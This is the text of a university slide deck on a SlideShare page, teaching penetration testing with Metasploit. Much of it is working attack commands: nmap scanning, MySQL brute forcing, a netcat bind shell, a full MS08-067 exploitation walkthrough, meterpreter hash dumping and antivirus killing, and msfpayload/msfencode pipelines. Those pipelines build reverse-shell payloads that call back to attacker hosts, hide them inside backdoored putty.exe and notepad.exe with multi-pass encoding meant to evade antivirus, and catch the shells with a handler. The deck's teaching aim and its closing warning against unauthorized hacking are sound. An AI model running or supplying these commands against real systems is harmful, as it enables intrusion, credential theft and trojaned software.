SlideShare uma empresa Scribd logo

Metasploit: Pwnage and Ponies

T
Trowalts

Introduction to metasploit that we presented to the 4th year compsci students at Rhodes university.Covering the basic functionality of metasploit, and penetration testing. The practical section that Etienne made (with Ponies) will come soon.

Tecnologia
1 de 19
Baixar para ler offline
The Metasploit Framework ● Vast collection of exploits, payloads and encoders. ● Modules for vulnerability scanning and information gathering. ● Modules for exploitation and session management. ● Modules for post exploitation, pivoting and getting all up in ur base.
Basics Exploits and Payloads By exploiting part of a system you interact with it in a manner not anticipated by the developers with the end goal of getting your own code(payload)/logic to execute. Pentesting == Legal Le Hacking ● PTES ● Watered down process ○ Information Gathering ■ port scans, service enumeration, mapping the attack vector. ■ Testing payloads against AV, making sure everything is ready. ○ Exploitation ■ Attacking hosts. ■ Compromise from any angle. ○ Post Exploitation ■ Pivot -> back to information gathering -> Exploitation ● This time should be faster ● Password re-use ● Passwords to crack ● pass the hash/token ● You might already have DA, so just go and find what you're after.
Different kinds of Pentest ● Web Applications ○ See OWASP ○ SQLi, XSS, Csrf, directory traversal, broken authentication, session management, access controls, reflected attacks, breaking application logic, client side attacks, information disclosure ● Footprint ○ What hosts/services are visible to public networks, information disclosure, forgotten hosts, incorrectly configured hardware. ● Infrastructure ○ Attacking hosts on a network, often internal to an organization or hosts found during the footprint. ○ Targeting hosts - OS and services (out dated/unpatched), weak password, incorrectly configured applications, zero days. ○ Targeting infrastructure - Routers and switches, IDS/IPS capabilities
nmap primer ● nmap is a port scanner and OS/service fingerprinting tool. ● It has become even more, welcome the NSE ○ Vuln checking and much more. Basic Scanning: nmap -sS 10.0.0.1-100 -p80 nmap -sS -O -A 10.0.0.55 nmap -oX - 10.0.0.1/24 In msfconsole (once you have a database connected) msf > db_connect <username>:<password>@127.0.0.1/my_msf_db Check that you are connected by using: msf > db_status db_nmap <options>
Interacting with Metasploit msfconsole Most used, feature rich, well supported. This is where the magic happens, make sure you run it as root. root@bt5:/# msfconsole msf > msfcli Focused towards scripting and interaction with other command line tools. Sexy one liners. armitage The metasploit GUI, nice for fuzzing but lets stick to msfconsole. Some of the other components you might use: msfpayload, msfencode, msfvenom Other bits of awesome: karmasploit, SET, Wmap
Metasploit DB First create a user and database root@bt5:/# su postgres postgres@bt5:/# createuser foobar -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) n Shall the new role be allowed to create databases? (y/n) n Shall the new role be allowed to create more new roles? (y/n) n postgres@bt5:/# createdb --owner=foobar foo_db Then in msfconsole conenct to the database msf > db_connect foobar:<password>@127.0.0.1/foo_db From now on you can work with the database in msfconsole, db_nmap will save nmap results to the database automaticly
Basic Commands ● use <module> ○ info ○ show options ○ set <option> <value> ● show ○ payloads ○ exploits ○ auxiliary ○ options ● search ○ string that will make your day, "show vnc" ● back
Brute Force Attacks Lets do a brute force dictionary attack on mysql server(s) First step is to find hosts running mysql nmap -sV -p3306 --open <IP Range> If that returns some hosts, you can target a specific one or if your lazy, skip the nmap scan and do it directly with the metasploit mysql login scanner msf > use auxiliary/scanner/mysql/mysql_login msf > set USERPASS /home/me/short.txt msf > set RHOSTS <IP || Range> msf > exploit
Shellz A shell is software that interacts between a user and the kernel, it provides an interface for interacting with the kernel. Bind Shell A bind shell "binds" a interactive shell to a port on the victims host, thus allowing the attacker (or anyone for that matter) to connect to it. A simple example using netcat; nc.exe -lvp 4444 -e cmd.exe Reverse Shell Creates a shell from the target host to the attackers host. Consider your target is sitting behind a NAT, this would stop you in your tracks if you tried to create a bind shell (unless you had already compromised their router and setup port forwarding). So if your target does not have a publicly accessible IP (but you do) use a reverse shell. NAT lolwut Meterpreter Shell The meta interpreter is a payload that provides complex and advanced functionality, all functions loaded and executed by meterpreter are done so in memory. Think of it as a meta shell with a ton of built in features that will save you a lot of time and effort. Some useful meterpreter commands are covered later, use the following for navigating sessions. meterpreter > background msf > sessions msf > sessions -i <session #>
The Art of Exploitation Information Gathering msf > db_nmap -sS -O -A 192.168.24.134 Now lets check for MS08-067 since its running XP < sp 3 msf > db_nmap --script smb-check-vulns.nse -p445 192.168.24.134 msf > vulns
The Art of Exploitation Confirming vulnerability, ready exploit msf > vulns showed us that the host was indeed vulnerable [*] Time: 2012-03-21 19:56:10 UTC Vuln: host=192.168.24.134 port=445 proto=tcp name=MS08-067 refs=CVE-2008- 4250,BID-31874,OSVDB-49243,CWE-94,MSFT-MS08-067,MSF-Microsoft Server Service Relative Path Stack Corruption,NSS-34476 Time to use our first exploit, first search for it: msf > search ms08-067 Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption Time to load the exploit: msf > use exploit/windows/smb/ms08_067_netapi Use show options || payloads to see the configuration options available. msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > show payloads
The Art of Exploitation Configure the exploit msf exploit(ms08_067_netapi) > set RHOST 192.168.24.134 RHOST => 192.168.24.134 msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp PAYLOAD => windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > show options Everything looks good, now run the exploit
The Art of Post Exploitation Meterpreter commands of interest: meterpreter > hashdump meterpreter > shell Current user, working directory and process ID meterpreter > getuid meterpreter > pwd meterpreter > getpid Now you can migrate to a more reliable process, although not really necessary in this case meterpreter > ps meterpreter > migrate <pid> Some fun meterpreter > screenshot meterpreter > run vnc meterpreter > run killav
MSFpayload Used to create payloads on their own, sharing is caring. msfpayload linux/x64/shell_reverse_tcp LHOST=41.12.1.12 LPORT=4444 x > funkytown.exe Stealthy ninja, hidden ginger. Launch payload while continuing normal execution. -k tells payload to launch in a separate thread (does not work with all executables, test, test, test) root@bt:/# msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x putty.exe -o var/www/putty_backdoor.exe -e x86/shikata_ga_nai -k -c 5
Multi-handler ● You have a payload ● The user will execute it (or you might) How do you handle the connection? ● Welcome to the multi-handler. root@bt:/# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=10.0.0.15 LPORT=6666 E [*] Please wait while we load the module tree... [*] Started reverse handler on 10.0.0.15:6666 [*] Starting the payload handler... [*] Command shell session 1 opened (10.0.0.15:6666 -> 10.0.0.10:1129) C:Documents and SettingsAdministratorMy DocumentsPron Downloads> :) Make sure the payload matches the one you created with msfpayload
MSFencode ● Anti-Virus Evasion ● IDS Evasion ● Taking care of bad characters in your shellcode ○ x00 and xff Show list of encoders: msfencode -l when in doubt, use x86/shikata_ga_nai a Polymorphic XOR Additive Feedback Encoder, the only encoder that has been rated Excellent. You can have multiple encoding runs: msfpayload windows/meterpreter/reverse_tcp LHOST=iam.a.lhama.lol LPORT=12345 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | ... Keep on Shuffling ... | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /var/www/jouma.exe
Hiding in plain sight Custom Executable Templates ● msfpayload embeds payload into a default executable template (data/templates/template.exe) ● While this template does change from time to time, AV companies check it. ● You can however use any windows executable in place of the default. ○ Use the -x option msfpayload windows/shell_reverse_tcp <options> R | msfencode -t exe -x custom/notepad.exe -o /var/www/ponies/inurbase.exe -e x86/shikata_ga_nai -c 5 Packers Tool that compresses an executable and combines it with decompression code. root@bt:/# upx -5 /var/www/payload.exe
Don't be stupid Pwnage is awesome ● getting shellz rock. ● realising you have remote code execution in a service is better than coke. ● Dumping hashes and cracking them makes you laugh. Getting caught is kak ● and you will get caught *cough* Sabu *cough* if you mess with systems without authorization. ● Having Bubba as a cellmate WILL be uncomfortable. ● No one likes a show off. ● Getting kicked out of university is counter productive and ill advised. ● So... DON'T BE STUPID
Don't be stupid Bubba loves ponies, you don't want to be a pony...

Recomendados

Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanningamiable_indian
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginnern|u - The Open Security Community
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Fit 13 penetration test 1
Fit 13 penetration test 1Fit 13 penetration test 1
Fit 13 penetration test 1chephz DJ
 

Recomendados

Pen-Testing with Metasploit
Pen-Testing with MetasploitPen-Testing with Metasploit
Pen-Testing with MetasploitMohammed Danish Amber
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanningamiable_indian
 
Vulnerability, exploit to metasploit
Vulnerability, exploit to metasploitVulnerability, exploit to metasploit
Vulnerability, exploit to metasploitTiago Henriques
 
Laboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingLaboratory exercise - Network security - Penetration testing
Laboratory exercise - Network security - Penetration testingseastorm44
 
Metasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassMetasploit for Penetration Testing: Beginner Class
Metasploit for Penetration Testing: Beginner ClassGeorgia Weidman
 
Metasploit Humla for Beginner
Metasploit Humla for BeginnerMetasploit Humla for Beginner
Metasploit Humla for Beginnern|u - The Open Security Community
 
Metasploit For Beginners
Metasploit For BeginnersMetasploit For Beginners
Metasploit For BeginnersRamnath Shenoy
 
Fit 13 penetration test 1
Fit 13 penetration test 1Fit 13 penetration test 1
Fit 13 penetration test 1chephz DJ
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with MetasploitM.Syarifudin, ST, OSCP, OSWP
 
Fileextraction with suricata
Fileextraction with suricataFileextraction with suricata
Fileextraction with suricataMrArora Arjuna
 
ICE Snow Leopard
ICE Snow LeopardICE Snow Leopard
ICE Snow LeopardTiago Rosado
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 
Metasploit
MetasploitMetasploit
MetasploitRaghunath G
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python toolsJose Manuel Ortega Candel
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usageSylvain Cortes
 
Suricata
SuricataSuricata
Suricatatex_morgan
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure SecurityUTD Computer Security Group
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)Masami Hiramatsu
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framworkDeepanshu Gajbhiye
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Enumeration
EnumerationEnumeration
EnumerationUTD Computer Security Group
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 
La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tpinkflawd
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tatSensePost
 

Mais conteúdo relacionado

Mais procurados

Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android DemoArpit Agarwal
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomSiddharth Krishna Kumar
 
Fileextraction with suricata
Fileextraction with suricataFileextraction with suricata
Fileextraction with suricataMrArora Arjuna
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawRedspin, Inc.
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureCyber Security Alliance
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usageSylvain Cortes
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsAndrew Case
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)Masami Hiramatsu
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...Cyber Security Alliance
 

Mais procurados (20)

Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Metasploit - Basic and Android Demo
Metasploit - Basic and Android DemoMetasploit - Basic and Android Demo
Metasploit - Basic and Android Demo
 
Intro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenomIntro to exploits in metasploitand payloads in msfvenom
Intro to exploits in metasploitand payloads in msfvenom
 
Pentest with Metasploit
Pentest with MetasploitPentest with Metasploit
Pentest with Metasploit
 
Fileextraction with suricata
Fileextraction with suricataFileextraction with suricata
Fileextraction with suricata
 
ICE Snow Leopard
ICE Snow LeopardICE Snow Leopard
ICE Snow Leopard
 
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David ShawBeginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
Beginner's Guide to the nmap Scripting Engine - Redspin Engineer, David Shaw
 
Killing any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented featureKilling any security product … using a Mimikatz undocumented feature
Killing any security product … using a Mimikatz undocumented feature
 
Metasploit
MetasploitMetasploit
Metasploit
 
Ethical hacking with Python tools
Ethical hacking with Python toolsEthical hacking with Python tools
Ethical hacking with Python tools
 
Spraykatz installation & basic usage
Spraykatz installation & basic usageSpraykatz installation & basic usage
Spraykatz installation & basic usage
 
Suricata
SuricataSuricata
Suricata
 
Hunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory ForensicsHunting Mac Malware with Memory Forensics
Hunting Mac Malware with Memory Forensics
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
Infrastructure Security
Infrastructure SecurityInfrastructure Security
Infrastructure Security
 
MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)MINCS - containers in the shell script (Eng. ver.)
MINCS - containers in the shell script (Eng. ver.)
 
Metasploit framwork
Metasploit framworkMetasploit framwork
Metasploit framwork
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Enumeration
EnumerationEnumeration
Enumeration
 
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
App secforum2014 andrivet-cplusplus11-metaprogramming_applied_to_software_obf...
 

Destaque

La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tpinkflawd
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tatSensePost
 
Viruses
VirusesViruses
Viruses/ /
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented DefenceSensePost
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerShellmates
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploitdevilback
 
Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22SensePost
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)Zoltan Balazs
 
Image Steganography using LSB
Image Steganography using LSBImage Steganography using LSB
Image Steganography using LSBSreelekshmi Sree
 
Metasploit
MetasploitMetasploit
Metasploitninguna
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 

Destaque (13)

La Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren'tLa Quadrature Du Cercle - The APTs That Weren't
La Quadrature Du Cercle - The APTs That Weren't
 
Rat a-tat-tat
Rat a-tat-tatRat a-tat-tat
Rat a-tat-tat
 
Viruses
VirusesViruses
Viruses
 
Offence oriented Defence
Offence oriented DefenceOffence oriented Defence
Offence oriented Defence
 
BSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama ElhamerBSides Algiers - Metasploit framework - Oussama Elhamer
BSides Algiers - Metasploit framework - Oussama Elhamer
 
Finalppt metasploit
Finalppt metasploitFinalppt metasploit
Finalppt metasploit
 
Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22Improvement in Rogue Access Points - SensePost Defcon 22
Improvement in Rogue Access Points - SensePost Defcon 22
 
Hacking Android OS
Hacking Android OSHacking Android OS
Hacking Android OS
 
Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT) Hacking with Remote Admin Tools (RAT)
Hacking with Remote Admin Tools (RAT)
 
Image Steganography using LSB
Image Steganography using LSBImage Steganography using LSB
Image Steganography using LSB
 
Metasploit
MetasploitMetasploit
Metasploit
 
Basic Metasploit
Basic MetasploitBasic Metasploit
Basic Metasploit
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 

Semelhante a Metasploit: Pwnage and Ponies

Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBakry3
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Frameworkegypt
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing toolmedoelkang600
 
Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)Amin Astaneh
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Client side exploits
Client side exploitsClient side exploits
Client side exploitsnickyt8
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Javier Tallón
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?Maciej Lasyk
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayKaren Oliver
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisTamas K Lengyel
 

Semelhante a Metasploit: Pwnage and Ponies (20)

Black hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slidesBlack hat dc-2010-egypt-uav-slides
Black hat dc-2010-egypt-uav-slides
 
Intrusion Techniques
Intrusion TechniquesIntrusion Techniques
Intrusion Techniques
 
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit FrameworkUnmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
Unmanned Aerial Vehicles: Exploit Automation with the Metasploit Framework
 
Backtrack Manual Part6
Backtrack Manual Part6Backtrack Manual Part6
Backtrack Manual Part6
 
Metasploit Computer security testing tool
Metasploit Computer security testing toolMetasploit Computer security testing tool
Metasploit Computer security testing tool
 
Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)Linux Server Deep Dives (DrupalCon Amsterdam)
Linux Server Deep Dives (DrupalCon Amsterdam)
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?Mitigating overflows using defense in-depth. What can your compiler do for you?
Mitigating overflows using defense in-depth. What can your compiler do for you?
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
Backtrack Manual Part8
Backtrack Manual Part8Backtrack Manual Part8
Backtrack Manual Part8
 
Hacking 101
Hacking 101Hacking 101
Hacking 101
 
Shall we play a game?
Shall we play a game?Shall we play a game?
Shall we play a game?
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Node.JS security
Node.JS securityNode.JS security
Node.JS security
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
Hacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysisHacktivity 2016: Stealthy, hypervisor based malware analysis
Hacktivity 2016: Stealthy, hypervisor based malware analysis
 

Último

QCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesQCon London: Mastering long-running processes in modern architectures
QCon London: Mastering long-running processes in modern architecturesBernd Ruecker
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Potential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsPotential of AI (Generative AI) in Business: Learnings and Insights
Potential of AI (Generative AI) in Business: Learnings and InsightsRavi Sanghani
 
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdfpanagenda
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical InfrastructureVarsha Sewlal- Cyber Attacks on Critical Critical Infrastructure
Varsha Sewlal- Cyber Attacks on Critical Critical Infrastructureitnewsafrica
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observabilityitnewsafrica
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxLoriGlavin3
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
